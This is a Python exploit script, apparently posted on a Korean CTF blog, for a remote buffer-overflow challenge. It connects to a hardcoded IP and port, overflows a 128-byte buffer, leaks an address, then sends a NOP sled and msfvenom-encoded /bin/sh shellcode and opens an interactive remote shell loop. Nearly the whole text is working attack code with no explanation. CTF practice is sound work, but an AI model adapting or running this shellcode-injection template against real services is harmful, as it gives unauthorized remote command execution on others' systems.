from socket import *
from struct import *
import time
#####################################
def until(s, string):
data=''
while string not in data:
data += s.recv(1)
return data
#####################################
p = lambda x: pack('<L',x)
q = lambda x:pack('<Q',x)
up = lambda x : unpack('<L',x)
uq = lambda x:unpack('<Q',x)
host = '54.173.98.115'
port = 1259
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host,port))
//msfvenom -p linux/x86/exec CMD=/bin/sh -b '\x00' -e x86/alpha_mixed
shellcode = "\x89\xe6\xdb\xce\xd9\x76\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59"
shellcode += "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
shellcode += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
shellcode += "\x75\x4a\x49\x71\x7a\x34\x4b\x61\x48\x4a\x39\x52\x72\x52"
shellcode += "\x46\x51\x78\x36\x4d\x72\x43\x4b\x39\x59\x77\x65\x38\x76"
shellcode += "\x4f\x70\x73\x42\x48\x53\x30\x31\x78\x74\x6f\x75\x32\x70"
shellcode += "\x69\x52\x4e\x4e\x69\x6b\x53\x73\x62\x6a\x48\x75\x58\x47"
shellcode += "\x70\x57\x70\x67\x70\x64\x6f\x75\x32\x70\x69\x62\x4e\x64"
shellcode += "\x6f\x54\x33\x70\x68\x35\x50\x71\x47\x42\x73\x4d\x59\x4d"
shellcode += "\x31\x4a\x6d\x6d\x50\x41\x41"
payload = "A" * 128
payload += p(0x475a31a5)
payload += p(0x40501555)
payload += "B" * 12 # sfp
payload += p(0x0804851D)
sock.send(payload + "\n")
lib = until(sock, "\n")
lib = lib[6:]
lib = int(lib,16) + 200
print lib
print until(sock, "\n")
payload2 = "A" * 128
payload2 += p(0x475a31a5)
payload2 += p(0x40501555)
payload2 += "B" * 16 # sfp
payload2 += p(lib) # ret
payload2 += "\x90" * 100
payload2 += shellcode
payload2 += "C" * 30
print "lib : " + hex(lib)
sock.send(payload2 + "\n")
print sock.recv(1024)
print sock.recv(1024)
while True:
cmd = raw_input('$ ')
sock.send(cmd+"\n")
print sock.recv(1024)
'CTF' 카테고리의 다른 글
DEFCON 2016 xkcd (0) | 2016.05.26 |
---|---|
2016 PCTF tonneree 200점 (0) | 2016.04.21 |
2016 codegate watermellon exploit only (0) | 2016.03.15 |
2016 codegate JS_IS_NOT_A_JAIL exploit only (0) | 2016.03.15 |
2015 Christmas CTF [FORENSIC] 100 do you want to~ (0) | 2016.01.08 |